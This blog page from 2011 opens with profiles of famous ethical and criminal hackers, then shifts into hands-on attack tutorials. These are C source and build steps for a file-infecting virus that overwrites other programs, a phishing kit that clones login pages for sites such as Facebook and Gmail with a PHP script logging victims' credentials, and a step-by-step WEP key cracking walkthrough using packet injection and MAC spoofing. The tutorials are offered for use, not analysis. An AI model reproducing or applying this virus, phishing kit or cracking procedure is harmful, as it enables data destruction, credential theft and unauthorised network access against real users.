Wednesday, September 28, 2011

The world's top 5 Non-Criminal hackers

Hackers that use their hacking skills for good are referred to as "white hat" hackers. Often referred to as Ethical Hackers, these non-criminal hackers are hired by companies to examine and test the integrity of their systems. Other white hat hackers, operate without company permission by bending but not breaking the laws and int progress have created some very cool features. This article examines and selects the Five Best Non-Criminal Hackers and the innovations and technologies that they have developed:

1. Stephen Wozniak

Nicknamed Woz, he is often referred to as the other Steve of Apple. Wozniak and Steve Jobs, co-founded Apple Computer. Woz started his hacking making blue boxes, which are devices that bypass telephone switching mechanisms enabling users to make free long distance calls. Woz and Jobs sold these blue boxes to their classmates in college and even used a blue box to call the Pope while pretending to be Henry Kissinger.
Wozniak dropped out of college and invented the compute that made him famous. Jobs had the idea to sell the computer as a fully assembled PC board. The idea was conceived and developed in Jobs garage. Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz currently focuses on philanthropy and no longer works full time for Apple. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."

2. Tim Berners-Lee

Berners-Lee is credited with being the inventor of the World Wide Web. Berners-Lee has been honored with numerous recognitions incuding the Millennium Technology Prize.
Berners-Lee was first caught hacking access codes with a friend while a student at Oxford University. He was then banned from the University computers.
Berners-Lee realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.

3. Linus Torvalds

Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the current Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."

4. Richard Stallman

Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom."
Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.

5. Tsutomu Shimomura

Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.

The world's top 5 criminal hackers

The Black Hat Hackers - CriminalsThese hackers are the ones that you've seen in shackles arrested for cybercrimes when they were just getting out of puberty. Some have done it for financial gain others just for fun.

1. Kevin Mitnick.

Mitnick is perhaps synonymous with Hacker. The Department of Justice still refers to him as "the most wanted computer criminal in United States history." His accomplishments were memorialized into two Hollywood movies: Takedown and Freedom Downtime.
Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Then similar to Steve Wozniak, of Apple, Mitnick tried Phone Phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick then embarked on a two and a half year coast to coast hacking spree. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. His fall came when he hacked into fellow computer expert and hacker Tsutomu Shimomura's home computer.
Mitnick is now a productive member of society. After serving 5 years and 8 months in solitary confinement, he is now a computer security author, consultant and speaker.

2. Adrian Lamo

Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo would use Internet connections at coffee shops, Kinko's and libraries to achieve his feats earning him the nickname "The Homeless Hacker". Lamo frequently found security flaws and exploited them. He would often inform the companies of the flaw.
Lamo's hit list includes Yahoo!, Citigroup, Bank of America and Cingular. Of course White Hat Hackers do this legally because they are hired by the company to such, Lamo however was breaking the law.
Lamo's intrusion into The New York Times intranet placed him squarely into the eyes of the top cyber crime offenders. For this crime, Lamo was ordered to pay $65,000 in restitution. Additionally, he was sentenced to six months home confinement and 2 years probation. Probation expired January of 2007. Lamo now is a notable public speaker and award winning journalist.

3. Jonathan James

At 16 years old, James gained enormous notoriety when he was the first minor to be sent to prison for hacking. He later admitted that he was just having fun and looking around and enjoyed the challenge.
James hit high profile organizations including the Defense Threat Reduction Agency, which is an agency of the Department of the Defense. With this hack he was able to capture usernames and passwords and view highly confidential emails.
High on James list, James also hacked in NASA computers and stole software valued at over $1.7 million. The Justice Department was quoted as saying: "The software stolen by James supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." Upon discovering this hack, NASA had to shut dow its entire computer system costing taxpayers $41,000. Today James aspires to start a computer security company.

4. Robert Tappan Morris

Morris is the son of a former National Security Agency scientist named Robert Morris. Robert is the creator of the Morris worm. This worm was credited as the first computer worm spread through the Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris created the worm while at Cornell as a student claiming that he intended to use the worm to see how large the Internet was at the time. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. Experts claim 6,000 machines were destroyed. Morris was ultimately sentenced to three years' probation, 400 hours of community service and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. His focus is computer network architecture.

5. Kevin Poulsen

Frequently referred to as Dark Dante, Poulsen gained national recognition for his hack into Los Angeles radio's KIIS-FM phone lines. These actions earned him a Porsche among many other items.
The FBI began to search for Poulson, when he hacked into the FBI database and federal computers for sensitive wiretap information. Poulsen's specialty was hacking into phone lines and he frequently took over all of a station's phone lines. Poulson also reactivated old Yellow Page escort telephone numbers for a partner who operated a virtual escort agency. Poulson was featured on Unsolved Mysteries and then captured in a supermarket. He was assessed a sentence of five years.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. His most popular article details his work on identifying 744 sex offenders with Myspace profiles.

Creating a virus : Tutorial


This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 
#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it

Fasttrack - an automated penetration tool for linux

Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming.


In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.


Installing Fast-Track:
make sure you have the latest version of Subversion

Open a terminal and type the following command (In Linux offcourse) :


svn co http://svn.thepentest.com/fasttrack /path-to-install/

The svn co simply means "check out" the latest version of Fast-Track, the /path-to-install/ is the directory you want to install Fast-Track.

If you want to update Fast-Track after you check out the files, simply type svn update, or use the Fast-Track menu to update.

When you first check out Fast-Track, there are a few modules that need to be installed, fortunately, Fast-Track comes with a setup file that helps you install the files needed. From the command line and in the Fast-Track menu, simply type:

python setup.py install

Follow the guide for installing Fast-Track, note that the setup does NOT install Metasploit for you. If you don't have Metasploit installed, some applications will not work properly. Ensure that you enter the right path to Metasploit.

Once installation has finished, run Fast-Track, if it errors out saying you do not have the proper requirements, type yes to try a different type of install. If this still doesn't work you will need to manually install the requirements.



now to run Fast-Track type:
./fast-track.py
 

to run the web GUI mod:
./ftgui
Open a browser and go to http://127.0.0.1:44444

Fast-Track HomePage: http://www.thepentest.com


Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.



So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-



header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php


Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".

Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.

Finding admin page of any site

A web site can easily be hacked if you know the hack the admin of the website. So for that you need to know the admin page of the website. And that could be a headache sometimes.


So here is a page made by a hacker that works for you and searches the site for the admin page.

http://sc0rpion.ir/af/

Just go to the site and enter the url of the site or blog followed by a  "/" and it would search for all those pages it thinks to be admin pages. Quite simple.

How it works-
The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not.
If there is any admin page it would show up.  

Backtrack : The linux distro made for and by hackers


Linux is obviously te best tool to try your hacking skills, as it is robust, made by hackers, gives you all tools for free and let you do what you want to do with it.To start your hacking stuff you need to get a lot of tools and you might be stuck when some tool starts creating error and you wish that your system had all these prehandedly. Here Backtrack comes in the scenario.

Backtrack linux is just what every hacker dreams of, a full system preloaded with every tool you would have ever wished for. It haws almost every tool ever invented for hackers to lay there hands on.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

Backtrack was made for everyone including tools for the amateur hackers to deep balck hats.

Download Backtrack here:
Normal download     Torrent

A few Tools

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
* BeEF (Browser Exploitation Framework)
* Hydra

A large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:

* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11, Bluetooth, RFID)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP
Source- http://www.backtrack-linux.org/

Wireless Hacking tutorial using Backtrack

Wireless Hacking with backtrack 3 is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :
 

- Backtrack 3 or newer release

- 1 wireless router

- Laptop with wireless card

And let the hack begins :

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.

***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
************************************************************************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.

Ok let’s start!
Commands | Meaning
====================

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down



* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)

* Lets start seeing what AP’s are there
airodump-ng (device)

* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer

* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930

Get backtrack linux at - http://www.backtrack-linux.org/